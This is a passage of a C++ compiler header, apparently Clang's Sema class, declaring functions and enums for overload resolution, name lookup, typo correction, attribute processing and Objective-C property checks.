bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool AllowExplicit = true,
bool AllowExplicitConversion = false,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddFunctionCandidates(const UnresolvedSetImpl &Functions,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
bool FirstArgumentIsBase = false);
void AddMethodCandidate(DeclAccessPair FoundDecl,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversion = false,
OverloadCandidateParamOrder PO = {});
void AddMethodCandidate(CXXMethodDecl *Method,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
ConversionSequenceList EarlyConversions = None,
OverloadCandidateParamOrder PO = {});
void AddMethodTemplateCandidate(FunctionTemplateDecl *MethodTmpl,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ObjectType,
Expr::Classification ObjectClassification,
ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool SuppressUserConversions = false,
bool PartialOverloading = false,
OverloadCandidateParamOrder PO = {});
void AddTemplateOverloadCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet, bool SuppressUserConversions = false,
bool PartialOverloading = false, bool AllowExplicit = true,
ADLCallKind IsADLCandidate = ADLCallKind::NotADL,
OverloadCandidateParamOrder PO = {});
bool CheckNonDependentConversions(
FunctionTemplateDecl *FunctionTemplate, ArrayRef<QualType> ParamTypes,
ArrayRef<Expr *> Args, OverloadCandidateSet &CandidateSet,
ConversionSequenceList &Conversions, bool SuppressUserConversions,
CXXRecordDecl *ActingContext = nullptr, QualType ObjectType = QualType(),
Expr::Classification ObjectClassification = {},
OverloadCandidateParamOrder PO = {});
void AddConversionCandidate(
CXXConversionDecl *Conversion, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddTemplateConversionCandidate(
FunctionTemplateDecl *FunctionTemplate, DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext, Expr *From, QualType ToType,
OverloadCandidateSet &CandidateSet, bool AllowObjCConversionOnExplicit,
bool AllowExplicit, bool AllowResultConversion = true);
void AddSurrogateCandidate(CXXConversionDecl *Conversion,
DeclAccessPair FoundDecl,
CXXRecordDecl *ActingContext,
const FunctionProtoType *Proto,
Expr *Object, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddNonMemberOperatorCandidates(
const UnresolvedSetImpl &Functions, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
void AddMemberOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
OverloadCandidateParamOrder PO = {});
void AddBuiltinCandidate(QualType *ParamTys, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet,
bool IsAssignmentOperator = false,
unsigned NumContextualBoolArguments = 0);
void AddBuiltinOperatorCandidates(OverloadedOperatorKind Op,
SourceLocation OpLoc, ArrayRef<Expr *> Args,
OverloadCandidateSet& CandidateSet);
void AddArgumentDependentLookupCandidates(DeclarationName Name,
SourceLocation Loc,
ArrayRef<Expr *> Args,
TemplateArgumentListInfo *ExplicitTemplateArgs,
OverloadCandidateSet& CandidateSet,
bool PartialOverloading = false);
// Emit as a 'note' the specific overload candidate
void NoteOverloadCandidate(
NamedDecl *Found, FunctionDecl *Fn,
OverloadCandidateRewriteKind RewriteKind = OverloadCandidateRewriteKind(),
QualType DestType = QualType(), bool TakingAddress = false);
// Emit as a series of 'note's all template and non-templates identified by
// the expression Expr
void NoteAllOverloadCandidates(Expr *E, QualType DestType = QualType(),
bool TakingAddress = false);
/// Check the enable_if expressions on the given function. Returns the first
/// failing attribute, or NULL if they were all successful.
EnableIfAttr *CheckEnableIf(FunctionDecl *Function, ArrayRef<Expr *> Args,
bool MissingImplicitThis = false);
/// Find the failed Boolean condition within a given Boolean
/// constant expression, and describe it with a string.
std::pair<Expr *, std::string> findFailedBooleanCondition(Expr *Cond);
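// E.g. for a failed static_assert(sizeof(T) == 4 && alignof(T) == 4) where
// only the alignment check is false, this walks the '&&' chain and returns
// the failing conjunct together with its printed form, so the diagnostic
// can name the specific condition that failed.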
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// non-ArgDependent DiagnoseIfAttrs.
///
/// Argument-dependent diagnose_if attributes should be checked each time a
/// function is used as a direct callee of a function call.
///
/// Returns true if any errors were emitted.
bool diagnoseArgDependentDiagnoseIfAttrs(const FunctionDecl *Function,
const Expr *ThisArg,
ArrayRef<const Expr *> Args,
SourceLocation Loc);
/// Emit diagnostics for the diagnose_if attributes on Function, ignoring any
/// ArgDependent DiagnoseIfAttrs.
///
/// Argument-independent diagnose_if attributes should be checked on every use
/// of a function.
///
/// Returns true if any errors were emitted.
bool diagnoseArgIndependentDiagnoseIfAttrs(const NamedDecl *ND,
SourceLocation Loc);
/// Returns whether the given function's address can be taken or not,
/// optionally emitting a diagnostic if the address can't be taken.
///
/// Returns false if taking the address of the function is illegal.
bool checkAddressOfFunctionIsAvailable(const FunctionDecl *Function,
bool Complain = false,
SourceLocation Loc = SourceLocation());
// [PossiblyAFunctionType] --> [Return]
// NonFunctionType --> NonFunctionType
// R (A) --> R(A)
// R (*)(A) --> R (A)
// R (&)(A) --> R (A)
// R (S::*)(A) --> R (A)
QualType ExtractUnqualifiedFunctionType(QualType PossiblyAFunctionType);
FunctionDecl *
ResolveAddressOfOverloadedFunction(Expr *AddressOfExpr,
QualType TargetType,
bool Complain,
DeclAccessPair &Found,
bool *pHadMultipleCandidates = nullptr);
FunctionDecl *
resolveAddressOfOnlyViableOverloadCandidate(Expr *E,
DeclAccessPair &FoundResult);
bool resolveAndFixAddressOfOnlyViableOverloadCandidate(
ExprResult &SrcExpr, bool DoFunctionPointerConversion = false);
FunctionDecl *
ResolveSingleFunctionTemplateSpecialization(OverloadExpr *ovl,
bool Complain = false,
DeclAccessPair *Found = nullptr);
bool ResolveAndFixSingleFunctionTemplateSpecialization(
ExprResult &SrcExpr,
bool DoFunctionPointerConversion = false,
bool Complain = false,
SourceRange OpRangeForComplaining = SourceRange(),
QualType DestTypeForComplaining = QualType(),
unsigned DiagIDForComplaining = 0);
Expr *FixOverloadedFunctionReference(Expr *E,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
ExprResult FixOverloadedFunctionReference(ExprResult,
DeclAccessPair FoundDecl,
FunctionDecl *Fn);
void AddOverloadedCallCandidates(UnresolvedLookupExpr *ULE,
ArrayRef<Expr *> Args,
OverloadCandidateSet &CandidateSet,
bool PartialOverloading = false);
// An enum used to represent the different possible results of building a
// range-based for loop.
enum ForRangeStatus {
FRS_Success,
FRS_NoViableFunction,
FRS_DiagnosticIssued
};
ForRangeStatus BuildForRangeBeginEndCall(SourceLocation Loc,
SourceLocation RangeLoc,
const DeclarationNameInfo &NameInfo,
LookupResult &MemberLookup,
OverloadCandidateSet *CandidateSet,
Expr *Range, ExprResult *CallExpr);
ExprResult BuildOverloadedCallExpr(Scope *S, Expr *Fn,
UnresolvedLookupExpr *ULE,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc,
Expr *ExecConfig,
bool AllowTypoCorrection=true,
bool CalleesAddressIsTaken=false);
bool buildOverloadedCallSet(Scope *S, Expr *Fn, UnresolvedLookupExpr *ULE,
MultiExprArg Args, SourceLocation RParenLoc,
OverloadCandidateSet *CandidateSet,
ExprResult *Result);
ExprResult CreateOverloadedUnaryOp(SourceLocation OpLoc,
UnaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *input, bool RequiresADL = true);
void LookupOverloadedBinOp(OverloadCandidateSet &CandidateSet,
OverloadedOperatorKind Op,
const UnresolvedSetImpl &Fns,
ArrayRef<Expr *> Args, bool RequiresADL = true);
ExprResult CreateOverloadedBinOp(SourceLocation OpLoc,
BinaryOperatorKind Opc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
bool RequiresADL = true,
bool AllowRewrittenCandidates = true,
FunctionDecl *DefaultedFn = nullptr);
ExprResult BuildSynthesizedThreeWayComparison(SourceLocation OpLoc,
const UnresolvedSetImpl &Fns,
Expr *LHS, Expr *RHS,
FunctionDecl *DefaultedFn);
ExprResult CreateOverloadedArraySubscriptExpr(SourceLocation LLoc,
SourceLocation RLoc,
Expr *Base,Expr *Idx);
ExprResult
BuildCallToMemberFunction(Scope *S, Expr *MemExpr,
SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult
BuildCallToObjectOfClassType(Scope *S, Expr *Object, SourceLocation LParenLoc,
MultiExprArg Args,
SourceLocation RParenLoc);
ExprResult BuildOverloadedArrowExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
bool *NoArrowOperatorFound = nullptr);
/// CheckCallReturnType - Checks that a call expression's return type is
/// complete. Returns true on failure. The location passed in is the location
/// that best represents the call.
bool CheckCallReturnType(QualType ReturnType, SourceLocation Loc,
CallExpr *CE, FunctionDecl *FD);
/// Helpers for dealing with blocks and functions.
bool CheckParmsForFunctionDef(ArrayRef<ParmVarDecl *> Parameters,
bool CheckParameterNames);
void CheckCXXDefaultArguments(FunctionDecl *FD);
void CheckExtraCXXDefaultArguments(Declarator &D);
Scope *getNonFieldDeclScope(Scope *S);
/// \name Name lookup
///
/// These routines provide name lookup that is used during semantic
/// analysis to resolve the various kinds of names (identifiers,
/// overloaded operator names, constructor names, etc.) into zero or
/// more declarations within a particular scope. The major entry
/// points are LookupName, which performs unqualified name lookup,
/// and LookupQualifiedName, which performs qualified name lookup.
///
/// All name lookup is performed based on some specific criteria,
/// which specify what names will be visible to name lookup and how
/// far name lookup should work. These criteria are important both
/// for capturing language semantics (certain lookups will ignore
/// certain names, for example) and for performance, since name
/// lookup is often a bottleneck in the compilation of C++. Name
/// lookup criteria are specified via the LookupNameKind enumeration.
///
/// The results of name lookup can vary based on the kind of name
/// lookup performed, the current language, and the translation
/// unit. In C, for example, name lookup will either return nothing
/// (no entity found) or a single declaration. In C++, name lookup
/// can additionally refer to a set of overloaded functions or
/// result in an ambiguity. All of the possible results of name
/// lookup are captured by the LookupResult class, which provides
/// the ability to distinguish among them.
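///
/// A minimal usage sketch (illustrative only, not part of this interface;
/// it assumes an IdentifierInfo 'II', a SourceLocation 'Loc', and a Scope
/// 'CurScope' are in hand inside a Sema member function):
/// \code
///   LookupResult R(*this, DeclarationName(II), Loc, LookupOrdinaryName);
///   if (LookupName(R, CurScope) && R.isSingleResult()) {
///     NamedDecl *ND = R.getFoundDecl(); // exactly one declaration found
///     (void)ND;
///   }
/// \endcode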
//@{
/// Describes the kind of name lookup to perform.
enum LookupNameKind {
/// Ordinary name lookup, which finds ordinary names (functions,
/// variables, typedefs, etc.) in C and most kinds of names
/// (functions, variables, members, types, etc.) in C++.
LookupOrdinaryName = 0,
/// Tag name lookup, which finds the names of enums, classes,
/// structs, and unions.
LookupTagName,
/// Label name lookup.
LookupLabel,
/// Member name lookup, which finds the names of
/// class/struct/union members.
LookupMemberName,
/// Look up of an operator name (e.g., operator+) for use with
/// operator overloading. This lookup is similar to ordinary name
/// lookup, but will ignore any declarations that are class members.
LookupOperatorName,
/// Look up of a name that precedes the '::' scope resolution
/// operator in C++. This lookup completely ignores operator, object,
/// function, and enumerator names (C++ [basic.lookup.qual]p1).
LookupNestedNameSpecifierName,
/// Look up a namespace name within a C++ using directive or
/// namespace alias definition, ignoring non-namespace names (C++
/// [basic.lookup.udir]p1).
LookupNamespaceName,
/// Look up all declarations in a scope with the given name,
/// including resolved using declarations. This is appropriate
/// for checking redeclarations for a using declaration.
LookupUsingDeclName,
/// Look up an ordinary name that is going to be redeclared as a
/// name with linkage. This lookup ignores any declarations that
/// are outside of the current scope unless they have linkage. See
/// C99 6.2.2p4-5 and C++ [basic.link]p6.
LookupRedeclarationWithLinkage,
/// Look up a friend of a local class. This lookup does not look
/// outside the innermost non-class scope. See C++11 [class.friend]p11.
LookupLocalFriendName,
/// Look up the name of an Objective-C protocol.
LookupObjCProtocolName,
/// Look up the implicit 'self' parameter of an Objective-C method.
LookupObjCImplicitSelfParam,
/// Look up the name of an OpenMP user-defined reduction operation.
LookupOMPReductionName,
/// Look up the name of an OpenMP user-defined mapper.
LookupOMPMapperName,
/// Look up any declaration with any name.
LookupAnyName
};
/// Specifies whether (or how) name lookup is being performed for a
/// redeclaration (vs. a reference).
enum RedeclarationKind {
/// The lookup is a reference to this name that is not for the
/// purpose of redeclaring the name.
NotForRedeclaration = 0,
/// The lookup results will be used for redeclaration of a name,
/// if an entity by that name already exists and is visible.
ForVisibleRedeclaration,
/// The lookup results will be used for redeclaration of a name
/// with external linkage; non-visible lookup results with external linkage
/// may also be found.
ForExternalRedeclaration
};
RedeclarationKind forRedeclarationInCurContext() {
// A declaration with an owning module for linkage can never link against
// anything that is not visible. We don't need to check linkage here; if
// the context has internal linkage, redeclaration lookup won't find things
// from other TUs, and we can't safely compute linkage yet in general.
if (cast<Decl>(CurContext)
->getOwningModuleForLinkage(/*IgnoreLinkage*/true))
return ForVisibleRedeclaration;
return ForExternalRedeclaration;
}
/// The possible outcomes of name lookup for a literal operator.
enum LiteralOperatorLookupResult {
/// The lookup resulted in an error.
LOLR_Error,
/// The lookup found no match but no diagnostic was issued.
LOLR_ErrorNoDiagnostic,
/// The lookup found a single 'cooked' literal operator, which
/// expects a normal literal to be built and passed to it.
LOLR_Cooked,
/// The lookup found a single 'raw' literal operator, which expects
/// a string literal containing the spelling of the literal token.
LOLR_Raw,
/// The lookup found an overload set of literal operator templates,
/// which expect the characters of the spelling of the literal token to be
/// passed as a non-type template argument pack.
LOLR_Template,
/// The lookup found an overload set of literal operator templates,
/// which expect the character type and characters of the spelling of the
/// string literal token to be passed as template arguments.
LOLR_StringTemplate
};
SpecialMemberOverloadResult LookupSpecialMember(CXXRecordDecl *D,
CXXSpecialMember SM,
bool ConstArg,
bool VolatileArg,
bool RValueThis,
bool ConstThis,
bool VolatileThis);
typedef std::function<void(const TypoCorrection &)> TypoDiagnosticGenerator;
typedef std::function<ExprResult(Sema &, TypoExpr *, TypoCorrection)>
TypoRecoveryCallback;
private:
bool CppLookupName(LookupResult &R, Scope *S);
struct TypoExprState {
std::unique_ptr<TypoCorrectionConsumer> Consumer;
TypoDiagnosticGenerator DiagHandler;
TypoRecoveryCallback RecoveryHandler;
TypoExprState();
TypoExprState(TypoExprState &&other) noexcept;
TypoExprState &operator=(TypoExprState &&other) noexcept;
};
/// The set of unhandled TypoExprs and their associated state.
llvm::MapVector<TypoExpr *, TypoExprState> DelayedTypos;
/// Creates a new TypoExpr AST node.
TypoExpr *createDelayedTypo(std::unique_ptr<TypoCorrectionConsumer> TCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC);
// The set of known/encountered (unique, canonicalized) NamespaceDecls.
//
// The boolean value will be true to indicate that the namespace was loaded
// from an AST/PCH file, or false otherwise.
llvm::MapVector<NamespaceDecl*, bool> KnownNamespaces;
/// Whether we have already loaded known namespaces from an external
/// source.
bool LoadedExternalKnownNamespaces;
/// Helper for CorrectTypo and CorrectTypoDelayed used to create and
/// populate a new TypoCorrectionConsumer. Returns nullptr if typo correction
/// should be skipped entirely.
std::unique_ptr<TypoCorrectionConsumer>
makeTypoCorrectionConsumer(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
DeclContext *MemberContext, bool EnteringContext,
const ObjCObjectPointerType *OPT,
bool ErrorRecovery);
public:
const TypoExprState &getTypoExprState(TypoExpr *TE) const;
/// Clears the state of the given TypoExpr.
void clearDelayedTypo(TypoExpr *TE);
/// Look up a name, looking for a single declaration. Return
/// null if the results were absent, ambiguous, or overloaded.
///
/// It is preferable to use the elaborated form and explicitly handle
/// ambiguity and overloading.
NamedDecl *LookupSingleName(Scope *S, DeclarationName Name,
SourceLocation Loc,
LookupNameKind NameKind,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupBuiltin(LookupResult &R);
bool LookupName(LookupResult &R, Scope *S,
bool AllowBuiltinCreation = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
bool InUnqualifiedLookup = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
CXXScopeSpec &SS);
bool LookupParsedName(LookupResult &R, Scope *S, CXXScopeSpec *SS,
bool AllowBuiltinCreation = false,
bool EnteringContext = false);
ObjCProtocolDecl *LookupProtocol(IdentifierInfo *II, SourceLocation IdLoc,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupInSuper(LookupResult &R, CXXRecordDecl *Class);
void LookupOverloadedOperatorName(OverloadedOperatorKind Op, Scope *S,
QualType T1, QualType T2,
UnresolvedSetImpl &Functions);
LabelDecl *LookupOrCreateLabel(IdentifierInfo *II, SourceLocation IdentLoc,
SourceLocation GnuLabelLoc = SourceLocation());
DeclContextLookupResult LookupConstructors(CXXRecordDecl *Class);
CXXConstructorDecl *LookupDefaultConstructor(CXXRecordDecl *Class);
CXXConstructorDecl *LookupCopyingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupCopyingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXConstructorDecl *LookupMovingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupMovingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXDestructorDecl *LookupDestructor(CXXRecordDecl *Class);
bool checkLiteralOperatorId(const CXXScopeSpec &SS, const UnqualifiedId &Id);
LiteralOperatorLookupResult LookupLiteralOperator(Scope *S, LookupResult &R,
ArrayRef<QualType> ArgTys,
bool AllowRaw,
bool AllowTemplate,
bool AllowStringTemplate,
bool DiagnoseMissing);
bool isKnownName(StringRef name);
/// Status of a function's emission, based on its CUDA/HIP/OpenMP host/device
/// attributes.
enum class FunctionEmissionStatus {
Emitted,
CUDADiscarded, // Discarded due to CUDA/HIP hostness
OMPDiscarded, // Discarded due to OpenMP hostness
TemplateDiscarded, // Discarded due to uninstantiated templates
Unknown,
};
FunctionEmissionStatus getEmissionStatus(FunctionDecl *Decl);
// Whether the callee should be ignored in the CUDA/HIP/OpenMP host/device
// check.
bool shouldIgnoreInHostDeviceCheck(FunctionDecl *Callee);
void ArgumentDependentLookup(DeclarationName Name, SourceLocation Loc,
ArrayRef<Expr *> Args, ADLResult &Functions);
void LookupVisibleDecls(Scope *S, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool LoadExternal = true);
void LookupVisibleDecls(DeclContext *Ctx, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool IncludeDependentBases = false,
bool LoadExternal = true);
enum CorrectTypoKind {
CTK_NonError, // CorrectTypo used in a non-error-recovery situation.
CTK_ErrorRecovery // CorrectTypo used in normal error recovery.
};
TypoCorrection CorrectTypo(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind,
Scope *S, CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr,
bool RecordFailure = true);
TypoExpr *CorrectTypoDelayed(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC, CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr);
/// Process any TypoExprs in the given Expr and its children, generating
/// diagnostics as appropriate and returning a new Expr if all typos were
/// successfully corrected, or ExprError if one or more typos could not be
/// corrected.
///
/// \param E The Expr to check for TypoExprs.
///
/// \param InitDecl A VarDecl to avoid because the Expr being corrected is its
/// initializer.
///
/// \param Filter A function applied to a newly rebuilt Expr to determine if
/// it is an acceptable/usable result from a single combination of typo
/// corrections. As long as the filter returns ExprError, different
/// combinations of corrections will be tried until all are exhausted.
ExprResult
CorrectDelayedTyposInExpr(Expr *E, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; });
ExprResult
CorrectDelayedTyposInExpr(Expr *E,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(E, nullptr, Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; }) {
return ER.isInvalid() ? ER : CorrectDelayedTyposInExpr(ER.get(), Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(ER, nullptr, Filter);
}
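/// A minimal sketch of using the Filter hook above (illustrative only; it
/// assumes an Expr 'E' that may contain delayed TypoExprs):
/// \code
///   ExprResult Fixed = CorrectDelayedTyposInExpr(
///       E, /*InitDecl=*/nullptr, [](Expr *Candidate) -> ExprResult {
///         // Reject rebuilt expressions of void type; other combinations of
///         // corrections will then be tried until all are exhausted.
///         if (Candidate->getType()->isVoidType())
///           return ExprError();
///         return Candidate;
///       });
/// \endcode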
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
bool ErrorRecovery = true);
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
const PartialDiagnostic &PrevNote,
bool ErrorRecovery = true);
void MarkTypoCorrectedFunctionDefinition(const NamedDecl *F);
void FindAssociatedClassesAndNamespaces(SourceLocation InstantiationLoc,
ArrayRef<Expr *> Args,
AssociatedNamespaceSet &AssociatedNamespaces,
AssociatedClassSet &AssociatedClasses);
void FilterLookupForScope(LookupResult &R, DeclContext *Ctx, Scope *S,
bool ConsiderLinkage, bool AllowInlineNamespace);
bool CheckRedeclarationModuleOwnership(NamedDecl *New, NamedDecl *Old);
void DiagnoseAmbiguousLookup(LookupResult &Result);
//@}
ObjCInterfaceDecl *getObjCInterfaceDecl(IdentifierInfo *&Id,
SourceLocation IdLoc,
bool TypoCorrection = false);
NamedDecl *LazilyCreateBuiltin(IdentifierInfo *II, unsigned ID,
Scope *S, bool ForRedeclaration,
SourceLocation Loc);
NamedDecl *ImplicitlyDefineFunction(SourceLocation Loc, IdentifierInfo &II,
Scope *S);
void AddKnownFunctionAttributes(FunctionDecl *FD);
// More parsing and symbol table subroutines.
void ProcessPragmaWeak(Scope *S, Decl *D);
// Decl attributes - this routine is the top level dispatcher.
void ProcessDeclAttributes(Scope *S, Decl *D, const Declarator &PD);
// Helper for delayed processing of attributes.
void ProcessDeclAttributeDelayed(Decl *D,
const ParsedAttributesView &AttrList);
void ProcessDeclAttributeList(Scope *S, Decl *D, const ParsedAttributesView &AL,
bool IncludeCXX11Attributes = true);
bool ProcessAccessDeclAttributeList(AccessSpecDecl *ASDecl,
const ParsedAttributesView &AttrList);
void checkUnusedDeclAttributes(Declarator &D);
/// Map any API notes provided for this declaration to attributes on the
/// declaration.
///
/// Triggered by declaration-attribute processing.
void ProcessAPINotes(Decl *D);
/// Determine if type T is a valid subject for nonnull and similar
/// attributes. By default, we look through references (the behavior used by
/// nonnull), but if the second parameter is true, then we treat a reference
/// type as valid.
bool isValidPointerAttrType(QualType T, bool RefOkay = false);
bool CheckRegparmAttr(const ParsedAttr &attr, unsigned &value);
bool CheckCallingConvAttr(const ParsedAttr &attr, CallingConv &CC,
const FunctionDecl *FD = nullptr);
bool CheckAttrTarget(const ParsedAttr &CurrAttr);
bool CheckAttrNoArgs(const ParsedAttr &CurrAttr);
bool checkStringLiteralArgumentAttr(const ParsedAttr &Attr, unsigned ArgNum,
StringRef &Str,
SourceLocation *ArgLocation = nullptr);
bool checkSectionName(SourceLocation LiteralLoc, StringRef Str);
bool checkTargetAttr(SourceLocation LiteralLoc, StringRef Str);
bool checkMSInheritanceAttrOnDefinition(
CXXRecordDecl *RD, SourceRange Range, bool BestCase,
MSInheritanceModel SemanticSpelling);
void CheckAlignasUnderalignment(Decl *D);
/// Adjust the calling convention of a method to be the ABI default if it
/// wasn't specified explicitly. This handles method types formed from
/// function type typedefs and typename template arguments.
void adjustMemberFunctionCC(QualType &T, bool IsStatic, bool IsCtorOrDtor,
SourceLocation Loc);
// Check if there is an explicit attribute, but only look through parens.
// The intent is to look for an attribute on the current declarator, but not
// one that came from a typedef.
bool hasExplicitCallingConv(QualType T);
/// Get the outermost AttributedType node that sets a calling convention.
/// Valid types should not have multiple attributes with different CCs.
const AttributedType *getCallingConvAttributedType(QualType T) const;
/// Check whether a nullability type specifier can be added to the given
/// type through some means not written in source (e.g. API notes).
///
/// \param type The type to which the nullability specifier will be
/// added. On success, this type will be updated appropriately.
///
/// \param nullability The nullability specifier to add.
///
/// \param diagLoc The location to use for diagnostics.
///
/// \param allowArrayTypes Whether to accept nullability specifiers on an
/// array type (e.g., because it will decay to a pointer).
///
/// \param overrideExisting Whether to override an existing, locally-specified
/// nullability specifier rather than complaining about the conflict.
///
/// \returns true if nullability cannot be applied, false otherwise.
bool checkImplicitNullabilityTypeSpecifier(QualType &type,
NullabilityKind nullability,
SourceLocation diagLoc,
bool allowArrayTypes,
bool overrideExisting);
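/// A minimal usage sketch (illustrative only; it assumes a QualType 'T'
/// coming from an API note and a diagnostic location 'Loc'):
/// \code
///   if (checkImplicitNullabilityTypeSpecifier(
///           T, NullabilityKind::NonNull, Loc,
///           /*allowArrayTypes=*/false, /*overrideExisting=*/false))
///     return; // nullability could not be applied; a conflict was diagnosed
/// \endcode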
/// Stmt attributes - this routine is the top level dispatcher.
StmtResult ProcessStmtAttributes(Stmt *Stmt,
const ParsedAttributesView &Attrs,
SourceRange Range);
void WarnConflictingTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
void CheckConflictingOverridingMethod(ObjCMethodDecl *Method,
ObjCMethodDecl *Overridden,
bool IsProtocolMethodDecl);
/// WarnExactTypedMethods - This routine issues a warning if a method's
/// implementation declaration exactly matches its interface declaration.
void WarnExactTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
typedef llvm::SmallPtrSet<Selector, 8> SelectorSet;
/// CheckImplementationIvars - This routine checks if the instance variables
/// listed in the implementation match those listed in the interface.
void CheckImplementationIvars(ObjCImplementationDecl *ImpDecl,
ObjCIvarDecl **Fields, unsigned nIvars,
SourceLocation Loc);
/// ImplMethodsVsClassMethods - This is the main routine to warn if any method
/// remains unimplemented in the class or category \@implementation.
void ImplMethodsVsClassMethods(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool IncompleteImpl = false);
/// DiagnoseUnimplementedProperties - This routine warns on those properties
/// which must be implemented by this implementation.
void DiagnoseUnimplementedProperties(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl *CDecl,
bool SynthesizeProperties);
/// Diagnose any null-resettable synthesized setters.
void diagnoseNullResettableSynthesizedSetters(const ObjCImplDecl *impDecl);
/// DefaultSynthesizeProperties - This routine default synthesizes all
/// properties which must be synthesized in the class's \@implementation.
void DefaultSynthesizeProperties(Scope *S, ObjCImplDecl *IMPDecl,
ObjCInterfaceDecl *IDecl,
SourceLocation AtEnd);
void DefaultSynthesizeProperties(Scope *S, Decl *D, SourceLocation AtEnd);
/// IvarBacksCurrentMethodAccessor - This routine returns 'true' if 'IV' is
/// an ivar synthesized for 'Method' and 'Method' is a property accessor
/// declared in class 'IFace'.
bool IvarBacksCurrentMethodAccessor(ObjCInterfaceDecl *IFace,
ObjCMethodDecl *Method, ObjCIvarDecl *IV);
/// DiagnoseUnusedBackingIvarInAccessor - Issue an 'unused' warning if the ivar
/// which
/// backs the property is not used in the property's accessor.
void DiagnoseUnusedBackingIvarInAccessor(Scope *S,
const ObjCImplementationDecl *ImplD);
/// GetIvarBackingPropertyAccessor - If the method is a property setter/getter
/// and the property has a backing ivar, returns that ivar; otherwise, returns
/// NULL. It also returns the ivar's property on success.
ObjCIvarDecl *GetIvarBackingPropertyAccessor(const ObjCMethodDecl *Method,
const ObjCPropertyDecl *&PDecl) const;
/// Called by ActOnProperty to handle \@property declarations in
/// class extensions.
ObjCPropertyDecl *HandlePropertyInClassExtension(Scope *S,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
unsigned &Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind);
/// Called by ActOnProperty and HandlePropertyInClassExtension to
